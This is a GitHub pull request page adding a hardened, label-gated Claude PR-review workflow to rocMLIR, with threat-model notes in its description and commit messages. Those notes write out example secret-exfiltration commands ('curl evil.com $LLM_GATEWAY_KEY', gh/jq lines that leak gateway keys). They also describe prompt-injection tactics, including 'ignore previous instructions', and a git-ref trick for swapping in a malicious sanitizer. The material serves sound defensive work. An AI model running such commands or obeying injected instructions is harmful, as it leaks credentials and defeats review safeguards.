Skip to content

Add Claude-powered PR review GitHub Actions workflow#2375

Open
umangyadav wants to merge 28 commits into
developfrom
wf/claude-pr-review
Open

Add Claude-powered PR review GitHub Actions workflow#2375
umangyadav wants to merge 28 commits into
developfrom
wf/claude-pr-review

Conversation

@umangyadav
Copy link
Copy Markdown
Member

@umangyadav umangyadav commented May 15, 2026

Adds a label-gated, three-workflow Claude PR review pipeline for rocMLIR. Maintainers apply the claude-review label to a same-repo PR and Claude posts line-by-line inline comments plus a top-level summary as rocmlir-pr-reviewer[bot] (a dedicated GitHub App). On re-runs, fixed issues get a "Resolved" reply, developer responses get a +1 reaction, and still-broken threads get a clarification — never a duplicate inline comment.

Architecture

Three workflows

  • .github/workflows/claude_auto_review.yml — the main reviewer. Triggers on pull_request: [labeled] (and workflow_dispatch as a smoke-test/escape hatch). Same-repo gated; fork PRs are skipped here. Two jobs:
    • review — has the LLM Gateway secrets (ANTHROPIC_BASE_URL, LLM_GATEWAY_KEY, USER_NTID) but no GitHub write surface. Runs claude-code-action with --allowedTools "Skill,Read,Grep,Glob" (no Bash, no Write, no MCP write surface, no network). Captures the model's structured response via --json-schema, materializes it to /tmp/pr/actions.json, then sanitizes (rejects suspected secret patterns, env-var-name echoes, ANTHROPIC_BASE_URL value echoes, \``suggestion-fence injection in prose; enforces per-string byte caps via utf8bytelength`, count caps).
    • post — has only contents: read on the default GITHUB_TOKEN; mints a separate rocMLIR-PR-Reviewer App installation token in-job for all comment / reply / reaction API calls. Pins checkout to ${{ github.event.repository.default_branch }} with persist-credentials: false and sparse-checkout for .github/scripts/, downloads the sanitized artifact, posts via raw gh api/gh pr comment.
    • cleanuppermissions: {} on the default token; mints its own App token for the label-DELETE call. Runs if: always() so a stuck label can never block retry.
  • .github/workflows/claude_auto_review_perimeter_banner.yml — fires on every PR open/synchronize/reopen via pull_request_target (no checkout, no PR code execution, fixed-template comment body). When the PR diff touches the security perimeter (.github/workflows/, .github/scripts/, .claude/), applies the modifies-ci-paths label and posts a one-time banner comment listing the touched files. Banner dedup filters by both author (rocmlir-pr-reviewer[bot]) AND a hidden marker so a PR commenter can't suppress it.
  • .github/workflows/claude_auto_review_fork_notify.yml — fires when the claude-review label is applied to a fork PR (also pull_request_target, no checkout). The main reviewer can't run on forks under pull_request (forks have no secrets), so this companion mints the App token, posts an explanatory comment with the workflow_dispatch escape hatch link, and removes the label.

Bot identity (rocMLIR-PR-Reviewer GitHub App)

Every comment / reply / reaction is posted under the dedicated rocmlir-pr-reviewer[bot] identity, minted from the rocMLIR-PR-Reviewer GitHub App via actions/create-github-app-token@bcd2ba4 (v3.2.0, SHA-pinned). Each job that needs GitHub credentials mints its own short-lived (1h) installation token in-step from secrets.ROCMLIR_PR_REVIEWER_APP_ID + secrets.ROCMLIR_PR_REVIEWER_PRIVATE_KEY — tokens are never written to disk, never propagated between jobs (job outputs are not encrypted), and never exposed to claude-code-action's environment.

The default GITHUB_TOKEN is locked down everywhere: contents: read only where checkout is used, permissions: {} everywhere else. The App's installation permissions (configured at the org level on the App itself) are the source of truth for what this pipeline can do on the repo. A prompt-injected Claude cannot escalate via the default token because the default token has no write capability anywhere.

The bot-login string is centralized in a workflow-level env: BOT_LOGIN: 'rocmlir-pr-reviewer[bot]' and referenced by claude-code-action's allowed_bots input + the prompt's bot-identity rules + the perimeter-banner's EXPECTED_AUTHOR. The two skills carry the literal string (markdown can't reference env). If the App's slug ever changes (verify via gh api /apps/<slug>), update those four locations.

We do NOT use the Anthropic OIDC token-exchange path that would make comments appear as claude[bot] — that path requires id-token: write in the review job, which we deliberately avoid.

Why pull_request and NOT pull_request_target?

pull_request_target has a long history of CVEs caused by "checkout PR HEAD with secrets in env, then run user-controlled code". Using pull_request removes that entire CVE class for fork PRs (forks run with empty secrets) and keeps the in-workflow hardening as defense-in-depth.

pull_request introduces a different residual risk: under pull_request the workflow file ITSELF is read from PR HEAD, so a same-repo contributor can push a malicious branch that modifies the workflow to remove --allowedTools/curl evil.com $LLM_GATEWAY_KEY/etc., then wait for any maintainer with triage permission to apply claude-review. This residual is not mitigatable from inside the workflow; it's mitigated externally by three required layers (full discussion in the SECURITY MODEL block at the top of claude_auto_review.yml):

  1. Repo configuration — CODEOWNERS protects .github/workflows/, .github/scripts/, .claude/; branch protection on develop requires code-owner review on perimeter changes; Settings → Actions → Require approval for ALL outside collaborators is enabled.
  2. Maintainer procedure — before applying claude-review, verify the PR doesn't touch the perimeter. The perimeter-banner workflow automates this with the modifies-ci-paths label + banner comment so in practice the maintainer just looks at the labels. If the PR legitimately needs to touch .github/ or .claude/, use the workflow_dispatch path INSTEAD of the label — dispatch runs from the trusted, code-owner-approved version of the workflow on develop. The review job snapshots the PR's perimeter files to /tmp/pr-source/ before the overlay so dispatch reviews still see the PR's actual proposed contents.
  3. In-workflow defense-in-depth — Layer-3 perimeter-block step (fails the run if the PR diff against the default branch touches the perimeter), SHA-pinned checkout (closes label-apply→checkout TOCTOU), persist-credentials: false, overlay of .claude/+.github/scripts/ from default branch, two-job split, sanitizer + JSON Schema + per-string caps + secret-pattern + URL-value scans, concurrency cancel-in-progress.

Files

File Purpose
.github/workflows/claude_auto_review.yml Main reviewer (review + post + cleanup jobs)
.github/workflows/claude_auto_review_perimeter_banner.yml Layer-2 automation: label + banner on perimeter-touching PRs
.github/workflows/claude_auto_review_fork_notify.yml Fork-PR UX: explain why label review doesn't run + dispatch link
.github/scripts/sanitize_claude_actions.sh Per-string byte caps, count caps, secret-pattern + env-var-name + URL-value + suggestion-fence scans
.github/scripts/secret_patterns.sh Shared regex catalogue (Anthropic/OpenAI/Slack/AWS/GH PAT/Azure APIM key/private-key shapes)
.github/scripts/post_claude_review.sh Posts inline comments + thread updates + summary; narrow 422 handling (only "line not in diff" is soft-skipped)
.github/CODEOWNERS Lists the security perimeter as code-owner-protected paths
.claude/skills/review-rocmlir-pr/SKILL.md Read-only review skill: rocMLIR Critical/Major/Minor checklist (LLVM/MLIR coding standards, license headers, verifier coverage, lit/E2E test requirements, MIGraphX downstream impact). RIGHT-side comments only. Optional single-line suggestion field for one-click commit.
.claude/skills/update-pr-review/SKILL.md Thread-aware reconciliation; latest_reply_is_claude gate prevents duplicate resolve/clarify on reruns
.gitignore Un-ignores .claude/skills/ so shared skills are tracked; personal Claude state stays ignored

Required repo configuration

The pipeline depends on these org/repo-level settings being in place before it can be merged:

  • GitHub App rocMLIR-PR-Reviewer installed on ROCm/rocMLIR with the following installation permissions:
    • Repository: Pull requests — Read & write (post comments, replies, reactions, edit PR labels)
    • Repository: Issues — Read & write (label add/remove uses the /issues/.../labels endpoint)
    • Repository: Metadata — Read (default; required by the App framework)
  • Repository secrets:
    • ROCMLIR_PR_REVIEWER_APP_ID — the App's numeric ID (Settings → Apps → rocMLIR-PR-Reviewer → App ID)
    • ROCMLIR_PR_REVIEWER_PRIVATE_KEY — the App's PEM private key (download from the same page; entire -----BEGIN…END----- block)
    • ANTHROPIC_BASE_URL, LLM_GATEWAY_KEY, USER_NTID — AMD LLM Gateway credentials (already configured per Motivation)
  • Branch protection on develop — require code-owner review for perimeter paths (.github/workflows/, .github/scripts/, .claude/).
  • Settings → Actions → General — "Require approval for ALL outside collaborators" (orthogonal mitigation for the same-repo gate).

Operational notes

  • To trigger a review: apply the claude-review label on a same-repo PR. The workflow runs end-to-end and the cleanup job removes the label, so re-applying retriggers.
  • For perimeter-touching PRs: do NOT apply claude-review (the Layer-3 guard will fail the run anyway). Instead use Actions → Claude Auto Review → Run workflow with the PR number — that path runs from develop's trusted version of the workflow.
  • For fork PRs: the main reviewer skips silently; the fork-notify companion posts the dispatch link.
  • The literal sk-ant-dummy-gateway-key in the workflow is a documented placeholder the action's input schema requires; it is ignored when ANTHROPIC_BASE_URL is set.

Motivation

Reduce review latency on rocMLIR PRs by surfacing the Critical/Major mechanical findings (LLVM/MLIR coding-standard violations, missing verifiers/tests, license-header issues, downstream MIGraphX impact) automatically, freeing human reviewers for design-level feedback. The two-job split + sanitizer + dedicated App identity makes it safe to do this on PR contents without exposing the LLM-gateway credentials to PR-controlled code or sharing a bot identity with other workflows.

Technical Details

See the SECURITY MODEL block at the top of .github/workflows/claude_auto_review.yml for the threat model and layered mitigations, and the inline comments throughout the sanitizer / post script / skills for the per-check rationale.

Test Plan

  • bash -n clean on all shell scripts.
  • yaml.safe_load clean on all three workflows.
  • JSON Schema in --json-schema parses; inline_comments[].side enum is ["RIGHT"] only.
  • Sanitizer fixture suite: legitimate payload passes; multi-byte content correctly measured by utf8bytelength; env-var-name preview redacted; ANTHROPIC_BASE_URL value scan with positive + negative cases; suggestion-fence injection in body fields rejected; secret patterns rejected.
  • post_claude_review.sh 422 narrowing fixture suite: real "part of the diff" 422 → soft skip exit 0; invalid commit_id 422 → hard fail; abuse-rate-limit 422 → hard fail; HTTP 500 → hard fail; "is not part of the diff" variant phrasing → soft skip.
  • Perimeter-banner: SIGPIPE-safe (awk instead of head -n 50) verified against a 5000-line × 10 KiB perimeter (old pipeline exits 141, new exits 0); markdown injection mitigated against adversarial filenames; banner dedup requires both rocmlir-pr-reviewer[bot] author AND marker.
  • App-token migration: structural assertions pass on all three workflows — every GH_TOKEN is sourced from steps.app-token.outputs.token, every Generate App token step is SHA-pinned, every app-token step appears before the first GH_TOKEN-using step, no leftover secrets.GITHUB_TOKEN, every author-filter location uses rocmlir-pr-reviewer[bot], default-token permissions never grant pull-requests: write or issues: write.
  • End-to-end smoke test on this PR by applying claude-review once the PR is otherwise approved AND the App is installed with the secrets configured.

Test Result

Local fixture suites all pass; smoke test pending (this PR is the canary).

Submission Checklist

Adds a label-gated, two-workflow pipeline that runs claude[bot] as an
automated reviewer on rocMLIR PRs, posting line-by-line inline comments
plus a short top-level summary. Modeled on the proven setup used in
ROCm/xla.

Why two workflows:
- claude_trigger.yml is a tiny pull_request_target dispatcher gated on
  the 'claude-review' label. It does NOT check out PR contents, so a
  malicious PR cannot influence it.
- claude_auto_review.yml is the full reviewer, triggered via
  repository_dispatch (and workflow_dispatch as a smoke-test escape
  hatch). It lives only on the default branch.

The split is required because claude-code-action uses OIDC to mint a
claude[bot] installation token, and Anthropic's token-exchange endpoint
rejects OIDC subjects of the form repo:ORG/REPO:pull_request (what
pull_request_target produces) but accepts ref-based subjects (what
repository_dispatch produces). Without the indirection, comments would
be posted by github-actions[bot] or fail outright.

Two new Claude Code skills under .claude/skills/:
- review-rocmlir-pr: read-only review skill with the rocMLIR-specific
  Critical/Major/Minor checklist (LLVM/MLIR coding standards, license
  headers, verifier coverage, lit/E2E test requirements, MIGraphX
  downstream impact). Emits structured findings with path/line/side/
  severity/body so each becomes its own threaded inline comment.
- update-pr-review: thread-aware updater. On re-runs, it posts Resolved
  replies on fixed issues, +1 reactions on developer responses, and
  clarifications on still-broken threads -- never duplicates an inline
  comment that was posted in a previous review.

Secret hygiene:
- All AMD LLM Gateway credentials flow through ${{ secrets.* }}
  (ANTHROPIC_BASE_URL, LLM_GATEWAY_KEY, USER_NTID). No literals in any
  workflow or skill file. The 'sk-ant-dummy-gateway-key' literal in
  claude_auto_review.yml is a documented placeholder the action's input
  schema requires; it is ignored when ANTHROPIC_BASE_URL is set.
- Bash whitelist on the action restricts Claude to gh/git/jq/head/grep
  plus the inline-comment MCP tool -- no arbitrary write shell.
- Permissions are minimized per workflow: contents:write on the trigger
  (needed only to dispatch), contents:read + pull-requests:write +
  id-token:write on the reviewer.

The .gitignore change un-ignores .claude/skills/ specifically so the
shared skills are tracked, while .claude/settings.local.json and any
other personal Claude state remain ignored.

Co-authored-by: Cursor <cursoragent@cursor.com>
@umangyadav umangyadav added the claude-review Trigger automated PR review by claude[bot]; auto-removed after the run. label May 15, 2026
umangyadav and others added 5 commits May 15, 2026 15:49
…w iteration

Addresses two review findings on the initial PR review pipeline:

1. update-pr-review iterated over fresh findings to decide thread updates,
   so once an old issue was fixed it disappeared from the fresh review
   output and Scenarios A/B (Resolved replies) were never reached. Now
   the skill iterates over previous Claude root comments first: missing
   matches in the fresh findings imply the issue is fixed -> Resolved
   reply; matches imply still-present -> clarification reply or skip.
   Genuinely-new fresh findings (no previous match) are emitted as
   inline comments.

2. claude_auto_review.yml exposed LLM Gateway secrets to a Claude run
   that read untrusted PR contents AND held shell access (Bash(gh *),
   Bash(jq *), etc.). A prompt-injection in any PR file could exfiltrate
   the gateway key via `gh pr comment $PR --body "$LLM_GATEWAY_KEY"` or
   even `jq -n 'env.LLM_GATEWAY_KEY'`. Restructured into two isolated
   jobs:

     Job 1 (review): has gateway secrets in env, but Claude is invoked
       with allowedTools restricted to Skill/Read/Grep/Glob/Write only
       -- no Bash, no MCP write surface, no GITHUB_TOKEN. PR data is
       pre-fetched in a plain shell step before Claude runs. The run
       output is /tmp/pr/actions.json, validated by a sanitizer step
       that rejects suspected secret patterns, missing schema fields,
       and oversized payloads.

     Job 2 (post): has GITHUB_TOKEN, no gateway secrets in env. Reads
       the artifact and posts inline comments, thread updates, and the
       summary via raw gh api in a plain bash script.

Even if a malicious PR successfully prompt-injects Claude, the worst it
can do is emit a malicious actions.json -- the sanitizer fails the build
before the artifact is uploaded, and the post job has no secret to leak.

New files:
  .github/scripts/sanitize_claude_actions.sh -- schema/size/secret-pattern
    validator. Tested against 10 fixtures (3 valid + 7 attack vectors).
  .github/scripts/post_claude_review.sh -- consumes actions.json and
    posts to GitHub. Skips inline comments whose line is not in the
    diff (HTTP 422) with a warning rather than failing the whole run.

Both shell scripts pass `bash -n` syntax check; both workflow files
pass actionlint clean.

Co-authored-by: Cursor <cursoragent@cursor.com>
…propagation, skill tools

Critical: actions/checkout in the review job persisted GITHUB_TOKEN to .git/config
  by default. Claude in that job has Read+Write tools, so a prompt-injected PR
  could read .git/config and write the token into actions.json or the execution
  log. Adding `persist-credentials: false` to both checkout steps removes the
  on-disk token. Also extended the sanitizer to detect `ghs_` installation tokens
  and the base64-encoded `x-access-token:ghs` prefix that
  `actions/checkout` writes to its http.extraheader -- belt-and-braces in case
  some other action re-enables credential persistence in the future.

Major: review job permissions were `contents:read + id-token:write` only. Once
  `permissions:` is specified, all unlisted scopes default to none, so the
  pre-fetch step's `gh pr view`, `gh pr diff`, `gh pr checks`, and
  `gh api .../pulls/N/comments` calls would fail. Added `pull-requests:read`
  and `checks:read`. Deliberately did NOT add `pull-requests:write` -- this job
  must remain unable to post anything to GitHub.

Major: post_claude_review.sh logged ::error:: on non-422 inline-comment failures
  but kept exit 0, masking partial-failure runs as green. Now tracks failures in
  HAD_FAILURE and exits 1 at the end if any non-skip-able post failed. Single
  bad inline comment no longer drops the rest of the postings (we keep going so
  one entry can't lose 5 good ones), but the job goes red so the failure is
  visible. Same treatment applied to thread updates and summary post.

Open question / clarification: skill frontmatter `allowed-tools` is a permission
  GRANT (skip per-use approval prompts) per the Claude Code docs
  (https://code.claude.com/en/skills "It does not restrict which tools are
  available"). It does not expand the session's available-tool set, which is
  governed by the workflow's `--allowedTools "Skill,Read,Grep,Glob,Write"`.
  So skill-level Bash() entries are inert in workflow context. But they
  obscured the security model on first read, so removed them from both skills
  and added an HTML comment explaining how to invoke each skill in interactive
  Stage-B local dry-runs (with `claude --allowedTools "...,Bash(gh *)"`).

All sanitizer fixtures still pass (12 cases now: 4 valid + 8 attack vectors,
including ghs_ token and base64 x-access-token prefix). actionlint clean.
Mock test of post_claude_review.sh confirms exit=1 on non-422 failure and
exit=0 on 422-only (line-not-in-diff) failures.

Co-authored-by: Cursor <cursoragent@cursor.com>
Critical / Major fixes from PR review:

- Re-restore .github/scripts/sanitize_claude_actions.sh from
  origin/${default_branch} immediately before running it. Claude has
  Write, so the initial overlay alone could be undone by a prompt-
  injected PR turning the sanitizer into a no-op that approves a
  malicious actions.json. The fetched ref is content-addressed, so this
  restore is provably the trusted version even if Claude touched .git/.
  Step also prints the script's sha256 for forensic audit.
- Pre-fetch step uses `set -euo pipefail` and writes `gh api ... >
  tempfile` before piping to jq. Without pipefail, a failed paginate was
  masked into `[]`, causing re-reviews to look like initial reviews and
  posting duplicate inline comments. Verified locally: simulated gh
  failure now exits 1 instead of silently producing [] + exit 0.
- Execution-log artifact upload gated on
  steps.sanitize.outcome == 'success', so the raw per-tool-call
  transcript only ships when Claude's outputs are known clean. The
  sanitizer's redacted-preview stderr is still in the workflow log for
  failure debugging.

Defense-in-depth aligned with Anthropic's published security guidance
and the April 2026 "Comment and Control" CVE post-mortem (CVSS 9.4):

- show_full_output: true -> false. Anthropic explicit warning that this
  can leak secrets through public-repo Action logs.
- --max-turns 15 added to claude_args. The CVE used loop injection to
  both run up cost and lengthen the window for prompt-injection drift
  past the ~15-call mark where prompt-level constraints degrade.
- Step-level timeout-minutes: 20 on the Run Claude review step (separate
  from the 30-minute job-level cap).
- Trust-boundary preamble in the prompt naming common injection patterns
  ("ignore previous instructions", exfil-via-curl, hidden HTML comments,
  base64 blobs) and stating Claude has no Bash / network / write tools.
- CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1 in the review job env, scrubbing
  Anthropic / cloud / GitHub Actions secrets from any subprocess Claude
  spawns (defense in depth even though Bash is not granted today).
- SHA-pinned anthropics/claude-code-action@v1, actions/checkout@v4,
  actions/upload-artifact@v4, actions/download-artifact@v4 to defend
  against upstream-action supply-chain compromise (the same attack class
  as the 2025 tj-actions/changed-files incident).

Verified: actionlint clean, bash -n clean on both scripts, sanitizer
fixtures still pass (good payload accepted, ghs_* token rejected),
silent-failure simulation confirms pipefail catches masked errors.

Co-authored-by: Cursor <cursoragent@cursor.com>
Two follow-up findings on the previous hardening pass:

Critical: ref-based "restore from default branch" was not actually safe.

  Old approach: `git restore --source="origin/${DEFAULT_BRANCH}"` to
  reload the sanitizer after Claude ran. The reviewer correctly pointed
  out that Claude with Write can rewrite .git/refs/remotes/origin/<branch>
  to point at a malicious commit already present in the local object DB
  (every commit on the PR head is fetched by actions/checkout). No SHA
  collision needed -- only flip the ref. The restore would then load the
  attacker's sanitizer.

  New approach: in the same step where we `git fetch`, capture the
  default-branch commit SHA into $GITHUB_OUTPUT (immutable -- step
  outputs live in the runner orchestrator, not on disk) and use
  `git show <SHA>:.github/scripts/<file>` to extract each sanitizer to
  /tmp/trusted/, then `chmod 0444` the files and `chmod 0555` the
  directory. The sanitize step calls `bash /tmp/trusted/...` directly,
  so no ref dereferencing happens at sanitize-time.

  This relies on POSIX permissions blocking Claude's Write tool. Verified
  empirically as a non-root user (the same UID class as `runner` on
  ubuntu-latest): fs.writeFileSync, shell `>` redirect, sibling-file
  creation in the locked dir, and `rm` all return EACCES; only `chmod`
  could break it, and Claude's allowed tools are
  Skill,Read,Grep,Glob,Write -- no Bash, no chmod syscall path.

  Documented the non-root-runner assumption in the workflow comment so
  anyone moving to a self-hosted runner that runs as root is warned that
  the protection disappears under UID 0 and they need container or mount
  isolation instead.

Major: execution log artifact was not protected by any sanitizer.

  Sanitizing actions.json only gates what Claude chose to surface to
  GitHub. The execution transcript additionally contains every
  Read/Grep/Glob/Skill I/O, so a prompt-injected Read of .git/config or
  env-dumped tempfile contents could ride out as the artifact even after
  actions.json passed.

  Added .github/scripts/sanitize_claude_execlog.sh which runs the same
  secret-pattern alternation against the raw bytes of the execution log
  file. Refactored .github/scripts/secret_patterns.sh as the shared
  source-of-truth for both sanitizers (DRY -- they cannot drift apart).
  The execution-log upload step is now gated on BOTH
  steps.sanitize.outcome == 'success' AND
  steps.sanitize_execlog.outcome == 'success'.

Verified: actionlint clean, bash -n clean on all four scripts, sanitizer
fixture battery passes (good/ghs_*/Bearer/env-var-name across both
sanitizers), end-to-end sanitizer execution from a chmod 0444/0555 mock
of /tmp/trusted/ succeeds, and POSIX immutability against
fs.writeFileSync confirmed at the syscall level on a non-root user.

Co-authored-by: Cursor <cursoragent@cursor.com>
Copy link
Copy Markdown
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Adds a label-gated Claude PR review pipeline for rocMLIR using a pull_request_target dispatcher, a repository_dispatch reviewer workflow, sanitizer/posting scripts, and Claude Code review/update skills.

Changes:

  • Adds GitHub Actions workflows to dispatch, run, sanitize, and post Claude-generated PR review results.
  • Adds shell scripts for secret-pattern detection, action JSON validation, execution-log scanning, and GitHub comment posting.
  • Adds .claude/skills review/update instructions and adjusts .gitignore so shared skills are tracked.

Reviewed changes

Copilot reviewed 8 out of 9 changed files in this pull request and generated 8 comments.

Show a summary per file
File Description
.gitignore Unignores shared Claude skills while keeping other Claude state ignored.
.github/workflows/claude_trigger.yml Dispatches Claude review runs when the claude-review label is applied.
.github/workflows/claude_auto_review.yml Runs the two-job Claude review, sanitization, artifact upload, posting, and label cleanup pipeline.
.github/scripts/secret_patterns.sh Defines shared secret and env-var-name regexes for sanitizer scripts.
.github/scripts/sanitize_claude_actions.sh Validates and scans Claude’s actions.json before posting.
.github/scripts/sanitize_claude_execlog.sh Scans Claude execution logs before artifact upload.
.github/scripts/post_claude_review.sh Posts inline comments, thread updates, reactions, and summary comments to GitHub.
.claude/skills/update-pr-review/SKILL.md Defines re-review reconciliation behavior for existing Claude review threads.
.claude/skills/review-rocmlir-pr/SKILL.md Defines rocMLIR-specific review instructions and output schema.
Comments suppressed due to low confidence (1)

.github/scripts/sanitize_claude_execlog.sh:61

  • This error path prints the full execution-log lines that mention an LLM-Gateway env var name. If a prompt-injected transcript contains NAME=value and the value does not match one of the generic secret regexes (for example an internal base URL or user identifier), the sanitizer will fail but still leak that value into the workflow log. Redact or suppress the matching lines before echoing them.
name_hits=$(grep -E "$ENV_VAR_NAMES" -- "$LOG_FILE" | head -3 || true)
if [[ -n "$name_hits" ]]; then
  echo "::error::Execution log mentions an LLM-Gateway env var name."
  echo "::error::Refusing to upload execution-log artifact."
  echo "::error::First matches (env-var-name visibility means likely exfil attempt):"
  echo "$name_hits"
  exit 2

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

Comment thread .github/workflows/claude_auto_review.yml
Comment thread .github/scripts/sanitize_claude_execlog.sh Outdated
Comment thread .claude/skills/update-pr-review/SKILL.md Outdated
Comment thread .claude/skills/update-pr-review/SKILL.md
Comment thread .github/scripts/post_claude_review.sh
Comment thread .github/workflows/claude_auto_review.yml Outdated
Comment thread .github/scripts/secret_patterns.sh
Comment thread .github/scripts/sanitize_claude_actions.sh Outdated
umangyadav and others added 4 commits May 15, 2026 17:03
…xeclog + concurrency)

Net -132 lines across 7 files (187 ins / 319 del). Adopts upstream
claude-code-action features that subsume custom code we were carrying:

Path A -- drop the claude[bot] cosmetic identity:
  - Delete .github/workflows/claude_trigger.yml entirely.
  - claude_auto_review.yml triggers directly on pull_request_target:
    types: [labeled] with a job-level if filter on the label name.
  - Drop id-token: write (no Anthropic OIDC token exchange needed when
    authenticating to a custom gateway via static API key).
  - Comments now appear as github-actions[bot] instead of claude[bot].

Structured outputs replace Write + /tmp/pr/actions.json:
  - Add --json-schema to claude_args; the schema mirrors what the
    sanitizer expects (paths, lines, sides, severities, types).
  - Drop Write from --allowedTools (now Skill,Read,Grep,Glob).
  - The model's final response is captured as
    steps.claude-code.outputs.structured_output and materialized to
    /tmp/pr/actions.json by a plain shell step.
  - Skill files (.claude/skills/*/SKILL.md) updated to drop Write from
    their allowed-tools frontmatter and instruct "return as final
    response" instead of "write to file".

This in turn makes the /tmp/trusted/ + chmod 0444 immutability
mechanism unnecessary -- Claude has no Write, so the workspace copy of
sanitize_claude_actions.sh cannot be tampered with mid-job. Reverts the
overlay step to a simple .claude/ + .github/scripts/ git restore from
the default branch and prints sha256 of the resulting scripts for
forensic visibility.

Drop the execution-log artifact:
  - Delete sanitize_claude_execlog.sh.
  - Drop the Sanitize Claude execution log + Upload Claude execution
    log steps. show_full_output: false already keeps secrets out of the
    workflow log UI; the unredacted execution-log artifact was a
    leak surface we don't actually need (debugging happens via the
    workflow log + the inline-comments artifact).

Slim the actions sanitizer:
  - --json-schema now validates outer JSON shape, required keys, array
    types, and per-element field types/enums in the action itself.
  - sanitize_claude_actions.sh keeps only what the schema can't
    express: whole-payload size cap, per-array length caps, per-body
    byte cap, conditional thread_update requirements
    (resolve_with_reaction needs human_reply_id, clarify needs body),
    and the secret/env-var-name pattern scans.
  - Update secret_patterns.sh comment now that there's only one
    consumer.

Add concurrency:
  - concurrency: { group: claude-review-<PR>, cancel-in-progress: true }
    cancels in-flight reviews on the same PR if a new label/dispatch
    event arrives. Avoids races on prev_comments.json reconciliation
    and prevents wasted spend when someone toggles the label.

Path #3 (collapse to pull_request) was rejected: pull_request from
forks has no secrets, which would break label-triggered reviews on
external-contributor PRs in this public repo.

Verified: actionlint clean, bash -n clean on all three remaining
scripts, sanitizer fixture battery passes (good payload, ghs_* leak
rejected, env-var-name rejected, clarify-without-body rejected,
resolve_with_reaction-without-human_reply_id rejected, plain resolve
accepted, oversized count rejected).

Co-authored-by: Cursor <cursoragent@cursor.com>
…son fix

Three review-feedback issues fixed.

1. Major -- re-review detection looked for the wrong bot.

After the previous simplification we authenticate to GitHub with the job's
GITHUB_TOKEN, which posts as github-actions[bot], not claude[bot]. But the
prompt + update-pr-review skill still counted previous comments by
  user.login == "claude[bot]" AND in_reply_to_id == null
so every re-run saw N == 0, entered initial-review mode, and would have
posted a duplicate full review on every label re-application.

Fix: post_claude_review.sh now appends a hidden HTML marker
"<!-- claude-pr-review-marker:v1 -->" to every body it posts (inline
comments, resolve / resolve_with_reaction / clarify replies, and the
top-level summary). A new with_marker() helper renders body + blank
line + marker; the marker is invisible in rendered markdown and is too
short / too generic to trip any pattern in secret_patterns.sh (verified
by sanitizer fixture).

The Claude prompt's "Step 1 -- Decide review mode" now counts:
  user.login == "github-actions[bot]"
  AND .body contains "<!-- claude-pr-review-marker:v1 -->"
  AND in_reply_to_id == null
with an explicit "do NOT match on claude[bot]" note explaining why.

The update-pr-review skill mirrors the change in two places:
  - Claude root comments: same triple condition.
  - Human replies to Claude: now defined as "any in-thread reply whose
    body does NOT contain the marker", so our own resolve/clarify
    replies (which now also carry the marker) are correctly excluded
    from the human-replies set even though they share the
    github-actions[bot] author with humans replying via another
    Actions-driven workflow.

The marker suffix is versioned (":v1") so a future body-format change
that needs to invalidate previously tagged comments can bump it.

2. Major -- failed review jobs left the claude-review label stuck.

Label cleanup was a step inside the post job. post has needs: review,
so any failure in review (sanitizer rejection, gateway timeout, schema
violation) skipped post entirely, leaving claude-review applied.
Re-applying the label is a no-op for a label that's already there, so
the user had no way to retry the review without first manually removing
the label.

Fix: extract the cleanup into its own job:
  cleanup:
    needs: [review, post]
    if: >-
      always()
      && github.event_name == 'pull_request_target'
      && github.event.label.name == 'claude-review'
    permissions: { pull-requests: write }
always() is a status filter only -- it ignores upstream
success/failure/skip but still respects the rest of the boolean
expression, so we keep the label gate to avoid firing this job for
every unrelated label add on every PR.

3. Minor -- failing checks were discarded from checks.json.

The pre-fetch step was:
  if ! gh pr checks ... > checks.json 2>/dev/null; then
    echo '[]' > checks.json
  fi
gh pr checks exits nonzero when any check is failing or pending, but
it still writes useful JSON to stdout in that case. The previous form
threw that JSON away and overwrote with [], hiding exactly the
failures the reviewer needs to see.

Fix: preserve stdout, ignore the rollup exit status, then validate
that we ended up with parseable JSON; only fall back to [] if gh
produced nothing parseable (auth failure, no checks defined yet):
  gh pr checks ... > checks.json 2>/dev/null || true
  if ! jq empty checks.json 2>/dev/null; then
    echo '[]' > checks.json
  fi

Verified:
- bash -n on all three remaining scripts (post / sanitize / patterns).
- python3 yaml.safe_load on the workflow + the resulting job graph
  (review -> post -> cleanup, with cleanup's needs/if/permissions all
  parsed as expected).
- Sanitizer fixture battery: good payload accepted; ghs_* leak,
  env-var-name (LLM_GATEWAY_KEY), clarify-without-body, and
  resolve_with_reaction-without-human_reply_id all rejected;
  marker-in-body fixture accepted (proves the new marker passes the
  secret-pattern + env-var-name scans).
- with_marker() rendering check: produces body + blank line + marker.

actionlint not installed locally; YAML validity + job-graph sanity
checked via python yaml + a hand-walk of the if/needs/permissions
fields on every job.

Co-authored-by: Cursor <cursoragent@cursor.com>
…-in-depth

Five review-feedback items addressed; three skipped with justification.

Addressed:

1. Low-3 -- TOCTOU between label application and checkout (security).

   Previously the checkout used `ref: refs/pull/<n>/head`, which means the
   labeler approves SHA1 but actions/checkout fetches whatever the PR head is
   when it runs (SHA2 if a force-push lands in the gap). We then reviewed SHA2
   and posted comments against SHA2, which was never approved-for-review.
   Same drift can happen between checkout and pre-fetch (gh pr view returns
   *current* head, not what we checked out), making inline-comment commit_ids
   point at a different commit than the diff Claude actually reviewed.

   Fix uses the same mechanism for both halves of the race:
     - Checkout step:
         ref: ${{ github.event.pull_request.head.sha
                  || format('refs/pull/{0}/head', inputs.pr_number) }}
       For pull_request_target this is the labeler-approved SHA. For
       workflow_dispatch (where pull_request is null) it falls through to
       refs/pull/<n>/head, which is fine because the dispatcher *is* the
       actor (no TOCTOU).
     - Pre-fetch step: drop headRefOid from `gh pr view --json` and inject
       `git rev-parse HEAD` instead. The SHA we actually checked out is the
       SHA we reviewed is the SHA the post job's commit_id will reference,
       end-to-end, regardless of any in-flight force-push.

   This is also a net simplification: no separate verify step, no SHA
   round-trip via env or artifact. Just one expression in the checkout's
   `ref:` and one jq line in pre-fetch.

2. Low-4 -- gh pr checks hid real errors behind 2>/dev/null (reliability).

   The previous form swallowed gh's stderr unconditionally, so an auth
   failure or network error became "checks.json fell back to []" with no
   diagnostic in the workflow log -- the reviewer would silently see "0
   checks" instead of a clear error pointing at the gh failure. Drop
   `2>/dev/null`. The existing `|| true` still prevents check-failure rollup
   from killing the job (which is the only reason the suppression was there);
   we still validate parseability with `jq empty` and fall back to [] only
   when gh produced nothing parseable.

